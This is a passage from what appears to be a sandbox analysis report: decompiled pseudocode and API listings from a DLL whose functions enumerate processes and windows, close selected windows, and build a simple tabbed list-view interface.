				intOrPtr _v336;
				char _v344;
				intOrPtr _v348;
				void* _v392;
				void* _t31;
				int _t56;
				void* _t60;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t82;

				_t75 = __ecx;
				SendMessageA( *(__ecx + 0x9cc), 0x1009, 0, 0);
				_t31 = CreateToolhelp32Snapshot(0xf, 0);
				_t62 =  &_v300;
				 *(_t75 + 0x74) = _t31;
				_v300 = 0x128;
				 *(_t75 + 0x77c) = Process32First(_t31,  &_v300);
				_t60 = _t75 + 0x67b;
				_t76 = _t75 + 0x57b;
				_t74 = _t75 + 0x9b0;
				do {
					E1001129D(_t62, _t82,  &_v268, _t75 + 0x478, _t75 + 0x47b, _t76, _t60);
					E1001D448(_t74, 1, 0, 0, 0, 0, 0, 0);
					_push(_t60);
					E10011245(_t75 + 0x78, "%s%s ", _t76);
					E1001D300(_t74, 0, 0, _t75 + 0x78);
					E10011245(_t75 + 0x178, "%08X", _v336);
					E1001D300(_t74, 0, 1, _t75 + 0x178);
					E10011245(_t75 + 0x378, "%d", _v328);
					E1001D300(_t74, 0, 2, _t75 + 0x378);
					E10011245(_t75 + 0x278, "%d", _v348);
					_t77 = _t77 + 0x48;
					E1001D300(_t74, 0, 3, _t75 + 0x278);
					E1001D300(_t74, 0, 4,  &_v344);
					_t62 =  &_v392;
					_t56 = Process32Next( *(_t75 + 0x74),  &_v392);
					 *(_t75 + 0x77c) = _t56;
				} while (_t56 != 0);
				CloseHandle( *(_t75 + 0x74));
				return SendMessageA( *(_t75 + 0x9cc), 0x1030, 0, 0);
			}

APIs

SendMessageA.USER32(?,00001009,00000000,00000000), ref: 10005CAC
CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 10005CB6
Process32First.KERNEL32 ref: 10005CCC

Part of subcall function 1001129D: _strlen.LIBCMT ref: 100112AD

Part of subcall function 1001D448: SendMessageA.USER32(?,00001007,00000000,?), ref: 1001D48A

Part of subcall function 1001D300: SendMessageA.USER32(?,0000102E,?,?), ref: 1001D321

Process32Next.KERNEL32 ref: 10005DDE
CloseHandle.KERNEL32(?,?,?), ref: 10005DF5
SendMessageA.USER32(?,00001030,00000000,00000000), ref: 10005E0B

Strings

%s%s , xrefs: 10005D27
%08X, xrefs: 10005D4F

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_strlen
String ID: %08X$%s%s
API String ID: 2343269832-3484543480
Opcode ID: f366ffc507e7e3069e60cdbcd24a79bff68196117bde326179d9980ce691bdc7
Instruction ID: 587af4a81c74a4c47c484b0c5cd1c7cce0284cb767108914adff7a162cdec2cb
Opcode Fuzzy Hash: f366ffc507e7e3069e60cdbcd24a79bff68196117bde326179d9980ce691bdc7
Instruction Fuzzy Hash: DD4141B2644B056BE261DB70DC46FEB77ECDB44700F400819F76A9A181DB75B6448791

Uniqueness

Uniqueness Score: -1.00%

Function 10006A40 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 92
windowCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E10006A40() {
				char _v4;
				intOrPtr _v16;
				void* __ecx;
				void* __ebp;
				struct HWND__* _t21;
				signed int _t22;
				intOrPtr* _t24;
				void* _t30;
				long _t32;
				signed int _t40;
				int _t44;
				long _t45;
				void* _t47;

				_t44 = 0;
				_t45 = _t32;
				if(SendMessageA( *(_t45 + 0x9cc), 0x1004, 0, 0) <= 0) {
					L9:
					SendMessageA( *(_t45 + 0x9cc), 0x1009, 0, 0);
					EnumWindows(E10006560, _t45);
					return SendMessageA( *(_t45 + 0x9cc), 0x1030, 0, 0);
				}
				do {
					if(SendMessageA( *(_t45 + 0x9cc), 0x102c, _t44, 2) == 2) {
						_push(1);
						_push(_t44);
						_t40 =  &_v4;
						_push(_t40);
						_t21 = E100114D3( *((intOrPtr*)(E1001D60B(_t45 + 0x9b0))));
						_t47 = _t47 + 4;
						_t22 = PostMessageA(_t21, 0x10, 0, 0);
						asm("sbb bl, bl");
						_t24 = _v16 + 0xfffffff0;
						_t30 =  ~_t22 + 1;
						asm("lock xadd [ecx], edx");
						if((_t40 | 0xffffffff) - 1 <= 0) {
							 *((intOrPtr*)( *((intOrPtr*)( *_t24)) + 4))(_t24);
						}
						if(_t30 != 0) {
							E1002027F(_t45, "Couldn\'t close the window", 0, 0);
						}
					}
					_t44 = _t44 + 1;
				} while (_t44 < SendMessageA( *(_t45 + 0x9cc), 0x1004, 0, 0));
				goto L9;
			}

APIs

SendMessageA.USER32(?,00001004,00000000,00000000), ref: 10006A5C
SendMessageA.USER32(?,0000102C,00000000,00000002), ref: 10006A76
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 10006AF3

Part of subcall function 1001D60B: __EH_prolog.LIBCMT ref: 1001D610
Part of subcall function 1001D60B: SendMessageA.USER32(?,0000102D,?,-00000044), ref: 1001D670

PostMessageA.USER32 ref: 10006AA2
SendMessageA.USER32(?,00001009,00000000,00000000), ref: 10006B0E
EnumWindows.USER32(Function_00006560), ref: 10006B16
SendMessageA.USER32(?,00001030,00000000,00000000), ref: 10006B2C

Strings

Couldn't close the window, xrefs: 10006AD6

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Send$EnumH_prologPostWindows
String ID: Couldn't close the window
API String ID: 3796729829-678758604
Opcode ID: a9188fad6d9ce2ef9a70b82c75abbea9bb5b9843e58846c950885e95225eed14
Instruction ID: 6c441cf6cc0e9fb159173b976aac16051cedaa664de8912bac0cdc2cdc7b8e57
Opcode Fuzzy Hash: a9188fad6d9ce2ef9a70b82c75abbea9bb5b9843e58846c950885e95225eed14
Instruction Fuzzy Hash: 7921D6717817417BF220E775CC86F97779AEB8ABA1F208518F35AAF1D1DAA0B4018614

Uniqueness

Uniqueness Score: -1.00%

Function 10006580 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 66
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10006580(void* __ecx) {
				void* _t34;

				_t34 = __ecx;
				E1001EF78(__ecx);
				SendMessageA( *(_t34 + 0x1c), 0x80, 1,  *(_t34 + 0xa50));
				E1001D3BE(_t34 + 0xa00, 1, 0, "&Processes", 0, 0);
				E1001D3BE(_t34 + 0xa00, 1, 1, "&Windows", 0, 0);
				SendMessageA( *(_t34 + 0x9cc), 0x1001, 0, 0);
				SendMessageA( *(_t34 + 0x9cc), 0x1026, 0, 0);
				SendMessageA( *(_t34 + 0x9cc), 0x1024, 0, 0xff00);
				SendMessageA( *(_t34 + 0x9cc), 0x1036, 0, SendMessageA( *(_t34 + 0x9cc), 0x1037, 0, 0) | 0x00000030);
				E10006450(_t34, SendMessageA( *(_t34 + 0x9cc), 0x1037, 0, 0) | 0x00000030);
				return 1;
			}

0x10006583
0x10006585
0x100065a2
0x100065b9
0x100065cd
0x100065e2
0x100065f4
0x10006609
0x1000662f
0x10006633
0x10006640

APIs

SendMessageA.USER32(?,00000080,00000001,?), ref: 100065A2

Part of subcall function 1001D3BE: SendMessageA.USER32(?,00001307,?,?), ref: 1001D3EB

SendMessageA.USER32(?,00001001,00000000,00000000), ref: 100065E2
SendMessageA.USER32(?,00001026,00000000,00000000), ref: 100065F4
SendMessageA.USER32(?,00001024,00000000,0000FF00), ref: 10006609
SendMessageA.USER32(?,00001037,00000000,00000000), ref: 1000661B
SendMessageA.USER32(?,00001036,00000000,00000000), ref: 1000662F

Strings

&Processes, xrefs: 100065A8
&Windows, xrefs: 100065C2

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend
String ID: &Processes$&Windows
API String ID: 3850602802-2420473455
Opcode ID: 3b63bf40ea6407cd7288c9d7e341552d29b1c36b5b1006bbeffa077e9a246eea
Instruction ID: bde570b2ca278c9b4ebfd3646b7d43a8c3087c49f07119d256a2563d362ed234
Opcode Fuzzy Hash: 3b63bf40ea6407cd7288c9d7e341552d29b1c36b5b1006bbeffa077e9a246eea
Instruction Fuzzy Hash: 25114475BD170436F234E6748C83F9AA2999F94F40F204819F756BF1C1C9F5B8814758

Uniqueness

Uniqueness Score: -1.00%

Function 1002404A Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1002404A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, short _a4) {
				intOrPtr _v8;
				char _v40;
				void _v68;
				intOrPtr _v72;
				intOrPtr _t14;
				void* _t15;
				int _t24;
				char* _t30;
				struct HDC__* _t32;

				_t14 =  *0x100371f4; // 0x82d1d2ba
				_t32 = GetStockObject;
				_t24 = 0xa;
				_v8 = _t14;
				_v72 = __ecx;
				_t30 = "System";
				_t15 = GetStockObject(0x11);
				if(_t15 != 0) {
					L2:
					if(GetObjectA(_t15, 0x3c,  &_v68) != 0) {
						_t30 =  &_v40;
						_t32 = GetDC(0);
						if(_v68 < 0) {
							_v68 =  ~_v68;
						}
						_t24 = MulDiv(_v68, 0x48, GetDeviceCaps(_t32, 0x5a));
						ReleaseDC(0, _t32);
					}
					L6:
					if(_a4 == 0) {
						_a4 = _t24;
					}
					return E10011A49(E10023F12(_t24, _v72, _t30, _t32, _t30, _a4), _v8);
				}
				_t15 = GetStockObject(0xd);
				if(_t15 == 0) {
					goto L6;
				}
				goto L2;
			}

APIs

GetStockObject.GDI32(00000011), ref: 1002406E
GetStockObject.GDI32(0000000D), ref: 10024076
GetObjectA.GDI32(00000000,0000003C,?), ref: 10024083
GetDC.USER32(00000000), ref: 10024092
GetDeviceCaps.GDI32(00000000,0000005A), ref: 100240A6
MulDiv.KERNEL32(00000000,00000048,00000000), ref: 100240B2
ReleaseDC.USER32 ref: 100240BD

Strings

System, xrefs: 10024069, 100240D3

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Object$Stock$CapsDeviceRelease
String ID: System
API String ID: 46613423-3470857405
Opcode ID: be9953e09329149153235f10064d0c1d86043838a4ef33d0fe9ce1ebdbda3fae
Instruction ID: 893a637e2b34bc5ffcf38017b698dc3b34be9f6003aa545906df9413b754d187
Opcode Fuzzy Hash: be9953e09329149153235f10064d0c1d86043838a4ef33d0fe9ce1ebdbda3fae
Instruction Fuzzy Hash: BC115131A00228EBEB10EBA0DDC9F9E7BB8EF04784F510115F705AB181DBB49D42CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1001FFD0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E1001FFD0(signed int _a4, signed int _a8) {
				struct HINSTANCE__* _t6;
				_Unknown_base(*)()* _t7;
				struct HINSTANCE__* _t13;
				struct HINSTANCE__* _t14;
				CHAR* _t16;
				signed int _t17;

				_t16 = "COMCTL32.DLL";
				_t14 = GetModuleHandleA(_t16);
				_t6 = LoadLibraryA(_t16);
				_t13 = _t6;
				if(_t13 == 0) {
					return _t6;
				} else {
					_t17 = 0;
					_t7 = GetProcAddress(_t13, "InitCommonControlsEx");
					if(_t7 != 0) {
						_push(_a4);
						if( *_t7() != 0) {
							_t17 = _a4;
							if(_t14 == 0) {
								__imp__#17();
								_t17 = _t17 | 0x00003fc0;
							}
						}
					} else {
						if((_a8 & 0x00003fc0) == _a8) {
							__imp__#17();
							_t17 = 0x3fc0;
						}
					}
					FreeLibrary(_t13);
					return _t17;
				}
			}

APIs

GetModuleHandleA.KERNEL32(COMCTL32.DLL,00008000,00000000,00000400,1002097F,?,00040000), ref: 1001FFD9
LoadLibraryA.KERNEL32(COMCTL32.DLL), ref: 1001FFE2
GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 1001FFF6
#17.COMCTL32 ref: 10020011
#17.COMCTL32 ref: 1002002D
FreeLibrary.KERNEL32(00000000), ref: 1002003A

Strings

InitCommonControlsEx, xrefs: 1001FFEE
COMCTL32.DLL, xrefs: 1001FFD3, 1001FFD8, 1001FFDF

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Library$AddressFreeHandleLoadModuleProc
String ID: COMCTL32.DLL$InitCommonControlsEx
API String ID: 1437655972-4218389149
Opcode ID: e9a7edff98b2f1dfa264ae8824ddf5643f812fe85e75b71ac61c600836a9cfcb
Instruction ID: 53882839bd82eee4790a95edd8c01e06678a9dcaf01e434a7ea0d4cd47d31c11
Opcode Fuzzy Hash: e9a7edff98b2f1dfa264ae8824ddf5643f812fe85e75b71ac61c600836a9cfcb
Instruction Fuzzy Hash: ACF08132A047639BE212DFA4ADC8A1FB6E9EF84391B560464FC10E3111CB64DC0A8661

Uniqueness

Uniqueness Score: -1.00%

Function 1001C7BE Relevance: 13.8, APIs: 9, Instructions: 291
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E1001C7BE(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t94;
				int _t95;
				int _t98;
				short* _t106;
				int _t109;
				short* _t111;
				short* _t118;
				short* _t119;
				short* _t126;
				char* _t132;
				char* _t133;
				long _t139;
				int _t141;
				int _t142;
				int _t143;
				int _t144;
				char _t154;
				char _t156;
				short* _t159;
				short* _t160;
				short* _t162;
				short* _t163;
				int _t166;
				void* _t167;
				int _t168;
				void* _t169;
				short* _t170;
				void* _t175;

				_push(0x40);
				_push(0x1002fa80);
				E10012CE0(__ebx, __edi, __esi);
				_t94 =  *0x100371f4; // 0x82d1d2ba
				 *((intOrPtr*)(_t169 - 0x1c)) = _t94;
				_t162 = 0;
				_t166 = 1;
				_t175 =  *0x1003a650 - _t162; // 0x0
				if(_t175 == 0) {
					if(CompareStringW(0, 0, 0x1002e9cc, 1, 0x1002e9cc, 1) == 0) {
						_t139 = GetLastError();
						__eflags = _t139 - 0x78;
						if(_t139 == 0x78) {
							 *0x1003a650 = 2;
						}
					} else {
						 *0x1003a650 = 1;
					}
				}
				if( *(_t169 + 0x14) > _t162) {
					 *(_t169 + 0x14) = E1001C7A2( *(_t169 + 0x10),  *(_t169 + 0x14));
				}
				_t95 =  *(_t169 + 0x1c);
				if(_t95 > _t162) {
					_t95 = E1001C7A2( *(_t169 + 0x18), _t95);
					 *(_t169 + 0x1c) = _t95;
				}
				_t144 =  *0x1003a650; // 0x0
				_t141 = 2;
				if(_t144 == _t141 || _t144 == _t162) {
					 *(_t169 - 0x38) = _t162;
					__eflags =  *(_t169 + 8) - _t162;
					if( *(_t169 + 8) == _t162) {
						_t109 =  *0x1003a4c0; // 0x0
						 *(_t169 + 8) = _t109;
					}
					_t142 =  *(_t169 + 0x20);
					__eflags = _t142 - _t162;
					if(_t142 == _t162) {
						_t142 =  *0x1003a4d0; // 0x0
					}
					_t167 = E10019AB4( *(_t169 + 8));
					__eflags = _t167 - 0xffffffff;
					if(_t167 != 0xffffffff) {
						__eflags = _t167 - _t142;
						if(__eflags == 0) {
							L67:
							_t166 = CompareStringA( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 + 0x10),  *(_t169 + 0x14),  *(_t169 + 0x18),  *(_t169 + 0x1c));
							__eflags = _t162;
							if(_t162 != 0) {
								_push(_t162);
								E1001111B();
								_push( *(_t169 - 0x38));
								E1001111B();
							}
							goto L69;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x14);
						_push( *(_t169 + 0x10));
						_push(_t167);
						_push(_t142);
						_t162 = E10019AF7(_t142, _t162, _t167, __eflags);
						__eflags = _t162;
						if(__eflags == 0) {
							goto L61;
						}
						_push(0);
						_push(0);
						_push(_t169 + 0x1c);
						_push( *(_t169 + 0x18));
						_push(_t167);
						_push(_t142);
						_t106 = E10019AF7(_t142, _t162, _t167, __eflags);
						 *(_t169 - 0x38) = _t106;
						__eflags = _t106;
						if(_t106 != 0) {
							 *(_t169 + 0x10) = _t162;
							 *(_t169 + 0x18) =  *(_t169 - 0x38);
							goto L67;
						}
						_push(_t162);
						E1001111B();
					}
					goto L61;
				} else {
					if(_t144 != _t166) {
						L61:
						_t98 = 0;
						L70:
						return E10012D1B(E10011A49(_t98,  *((intOrPtr*)(_t169 - 0x1c))));
					}
					 *(_t169 - 0x3c) = _t162;
					 *(_t169 - 0x44) = _t162;
					 *(_t169 - 0x40) = _t162;
					if( *(_t169 + 0x20) == _t162) {
						_t144 =  *0x1003a4d0; // 0x0
						 *(_t169 + 0x20) = _t144;
					}
					if( *(_t169 + 0x14) == _t162 || _t95 == _t162) {
						if( *(_t169 + 0x14) != _t95) {
							__eflags = _t95 - _t166;
							if(_t95 > _t166) {
								L69:
								_t98 = _t166;
								goto L70;
							}
							__eflags =  *(_t169 + 0x14) - _t166;
							if( *(_t169 + 0x14) <= _t166) {
								_t111 = GetCPInfo( *(_t169 + 0x20), _t169 - 0x30);
								__eflags = _t111;
								if(_t111 == 0) {
									goto L61;
								}
								__eflags =  *(_t169 + 0x14) - _t162;
								if( *(_t169 + 0x14) <= _t162) {
									__eflags =  *(_t169 + 0x1c) - _t162;
									if( *(_t169 + 0x1c) <= _t162) {
										goto L38;
									}
									__eflags =  *(_t169 - 0x30) - _t141;
									if( *(_t169 - 0x30) < _t141) {
										goto L69;
									}
									_t132 = _t169 - 0x2a;
									__eflags =  *((char*)(_t169 - 0x2a));
									if( *((char*)(_t169 - 0x2a)) == 0) {
										goto L69;
									} else {
										goto L33;
									}
									while(1) {
										L33:
										_t159 =  *((intOrPtr*)(_t132 + 1));
										__eflags = _t159;
										if(_t159 == 0) {
											goto L69;
										}
										_t154 =  *( *(_t169 + 0x18));
										__eflags = _t154 -  *_t132;
										if(_t154 <  *_t132) {
											L36:
											_t132 = _t132 + _t141;
											__eflags =  *_t132;
											if( *_t132 != 0) {
												continue;
											}
											goto L69;
										}
										__eflags = _t154 - _t159;
										if(_t154 <= _t159) {
											goto L17;
										}
										goto L36;
									}
									goto L69;
								}
								__eflags =  *(_t169 - 0x30) - _t141;
								if( *(_t169 - 0x30) < _t141) {
									goto L20;
								}
								_t133 = _t169 - 0x2a;
								__eflags =  *((char*)(_t169 - 0x2a));
								if( *((char*)(_t169 - 0x2a)) == 0) {
									goto L20;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t160 =  *((intOrPtr*)(_t133 + 1));
									__eflags = _t160;
									if(_t160 == 0) {
										goto L20;
									}
									_t156 =  *( *(_t169 + 0x10));
									__eflags = _t156 -  *_t133;
									if(_t156 <  *_t133) {
										L28:
										_t133 = _t133 + _t141;
										__eflags =  *_t133;
										if( *_t133 != 0) {
											continue;
										}
										goto L20;
									}
									__eflags = _t156 - _t160;
									if(_t156 <= _t160) {
										goto L17;
									}
									goto L28;
								}
							}
							L20:
							_t98 = 3;
							goto L70;
						}
						L17:
						_t98 = _t141;
						goto L70;
					} else {
						L38:
						_t143 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x10),  *(_t169 + 0x14), _t162, _t162);
						 *(_t169 - 0x48) = _t143;
						__eflags = _t143 - _t162;
						if(_t143 == _t162) {
							goto L61;
						}
						 *(_t169 - 4) = _t162;
						E100116D0(_t143 + _t143 + 0x00000003 & 0xfffffffc, _t144);
						 *(_t169 - 0x18) = _t170;
						 *(_t169 - 0x34) = _t170;
						 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
						_t118 =  *(_t169 - 0x34);
						__eflags = _t118 - _t162;
						if(_t118 != _t162) {
							L43:
							_t119 = MultiByteToWideChar( *(_t169 + 0x20), _t166,  *(_t169 + 0x10),  *(_t169 + 0x14), _t118, _t143);
							__eflags = _t119;
							if(_t119 == 0) {
								L53:
								__eflags =  *(_t169 - 0x3c);
								if( *(_t169 - 0x3c) != 0) {
									_push( *(_t169 - 0x34));
									E1001111B();
								}
								_t98 =  *(_t169 - 0x40);
								goto L70;
							}
							_t168 = MultiByteToWideChar( *(_t169 + 0x20), 9,  *(_t169 + 0x18),  *(_t169 + 0x1c), 0, 0);
							 *(_t169 - 0x4c) = _t168;
							__eflags = _t168;
							if(_t168 == 0) {
								goto L53;
							}
							 *(_t169 - 4) = 1;
							E100116D0(_t168 + _t168 + 0x00000003 & 0xfffffffc, _t144);
							 *(_t169 - 0x18) = _t170;
							_t163 = _t170;
							 *(_t169 - 0x50) = _t163;
							 *(_t169 - 4) =  *(_t169 - 4) | 0xffffffff;
							__eflags = _t163;
							if(_t163 != 0) {
								L49:
								_t126 = MultiByteToWideChar( *(_t169 + 0x20), 1,  *(_t169 + 0x18),  *(_t169 + 0x1c), _t163, _t168);
								__eflags = _t126;
								if(_t126 != 0) {
									 *(_t169 - 0x40) = CompareStringW( *(_t169 + 8),  *(_t169 + 0xc),  *(_t169 - 0x34), _t143, _t163, _t168);
								}
								__eflags =  *(_t169 - 0x44);
								if( *(_t169 - 0x44) != 0) {
									_push(_t163);
									E1001111B();
								}
								goto L53;
							} else {
								_t163 = E10011233(_t168 + _t168);
								__eflags = _t163;
								if(_t163 == 0) {
									goto L53;
								}
								 *(_t169 - 0x44) = 1;
								goto L49;
							}
						} else {
							_t118 = E10011233(_t143 + _t143);
							_pop(_t144);
							 *(_t169 - 0x34) = _t118;
							__eflags = _t118 - _t162;
							if(_t118 == _t162) {
								goto L61;
							}
							 *(_t169 - 0x3c) = _t166;
							goto L43;
						}
					}
				}
			}

APIs

CompareStringW.KERNEL32(00000000,00000000,1002E9CC,00000001,1002E9CC,00000001,1002FA80,00000040,1001C297,?,00000001,?,00000000,?,00000000,?), ref: 1001C7EA
GetLastError.KERNEL32(?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC,1002F7B0,00000018,10019779,1002F7C0,00000008,100136D4), ref: 1001C7FC
GetCPInfo.KERNEL32(00000000,00000000,1002FA80,00000040,1001C297,?,00000001,?,00000000,?,00000000,?,?,1001B1DE,00000000,00000000), ref: 1001C8A6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000004,00000000,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C934
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000004,00000190,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9AD
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,100108AC,00000000,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001C9CA
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,100108AC,?,00000000,?,1001B1DE,00000000,00000000,00000000,00000000,00000000,00000000,100191A7,1002F7AC), ref: 1001CA40

Memory Dump Source

Source File: 00000003.00000002.406880675.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.406877280.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406905518.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406913485.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000003.00000002.406919136.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$CompareErrorInfoLastString
String ID:
API String ID: 1773772771-0
Opcode ID: c2a9654bce04bb3dfd3ae6f70a3aadc38838c364b5b5f22daabd5658bc680001
Instruction ID: 34c776e7f8faf31f0108240468111debbd61bad935cb1227d3b7454dc675b75e
Opcode Fuzzy Hash: c2a9654bce04bb3dfd3ae6f70a3aadc38838c364b5b5f22daabd5658bc680001
Instruction Fuzzy Hash: 55B1887190025EAFCB12CFA4DC82E9E7BB5FF45794F64011AF900AA2A1DB31D991CB91

Uniqueness

Uniqueness Score: -1.00%

Function 100134EA Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 227
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E100134EA(void* __eax, signed int __edx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				void* __esi;
				void* __ebp;
				char _t72;
				signed int _t74;
				void* _t86;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t95;
				void* _t98;
				void* _t101;
				void* _t105;
				intOrPtr _t109;
				intOrPtr _t111;
				void* _t123;
				signed int _t124;
				signed int _t125;
				void* _t127;
				signed int _t133;
				signed int _t138;
				signed int _t139;
				void* _t141;
				signed int _t145;
				signed int _t150;
				signed int _t154;
				signed int _t156;
				signed int _t161;
				signed int _t163;
				void* _t171;

				_t138 = __edx;
				_t141 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x14));
				asm("cdq");
				_t154 = __edx;
				_v16 = _t72;
				_v12 = __edx;
				if(_t154 < 0 || _t154 <= 0 && _t72 < 0x45) {
					L30:
					_t139 = _t138 | 0xffffffff;
					__eflags = _t139;
					return _t139;
				} else {
					_t156 = _v12;
					if(_t156 > 0 || _t156 >= 0 && _v16 > 0x44c) {
						goto L30;
					} else {
						_t74 =  *(_t141 + 0x10);
						if(_t74 < 0 || _t74 > 0xb) {
							asm("cdq");
							_t124 = 0xc;
							_t138 = _t74 % _t124;
							_t125 = _t138;
							asm("cdq");
							_v16 = _v16 + _t74 / _t124;
							 *(_t141 + 0x10) = _t125;
							asm("adc [ebp-0x8], edx");
							if(_t125 < 0) {
								_v16 = _v16 + 0xffffffff;
								 *(_t141 + 0x10) = _t125 + 0xc;
								asm("adc dword [ebp-0x8], 0xffffffff");
							}
							_t161 = _v12;
							if(_t161 < 0 || _t161 <= 0 && _v16 < 0x45) {
								goto L30;
							} else {
								_t163 = _v12;
								if(_t163 > 0 || _t163 >= 0 && _v16 > 0x44c) {
									goto L30;
								} else {
									goto L16;
								}
							}
						} else {
							L16:
							_t145 =  *(_t141 + 0x10);
							asm("cdq");
							_v24 =  *((intOrPtr*)(0x10037c4c + _t145 * 4));
							_v20 = _t138;
							if((E100197E0(_v16, _v12, 4, 0) | _t138) != 0 || (E100197E0(_v16, _v12, 0x64, 0) | _t138) == 0) {
								asm("adc ecx, 0x0");
								if((E100197E0(_v16 + 0x76c, _v12, 0x190, 0) | _t138) != 0) {
									goto L21;
								}
								goto L19;
							} else {
								L19:
								if(_t145 > 1) {
									_v24 = _v24 + 1;
									asm("adc dword [ebp-0x10], 0x0");
								}
								L21:
								_t138 = _v12;
								_t127 = 0;
								_t147 = _v16 - 1;
								asm("sbb eax, ecx");
								_v28 = _v12;
								asm("adc edx, ecx");
								_v32 = _v16 - 1;
								_t86 = E10013440(_v16 + 0x12b, _t138, 0x190, _t127);
								asm("cdq");
								asm("adc ecx, edx");
								_v8 = _t138;
								_t88 = E10013440(_v16 - 1, _v28, 0x64, 0);
								asm("sbb eax, edx");
								_t90 = E10013440(_t147, _v28, 4, 0);
								asm("adc eax, edx");
								_t92 = E10013400(_v16, _v12, 0x16d, 0);
								asm("adc eax, edx");
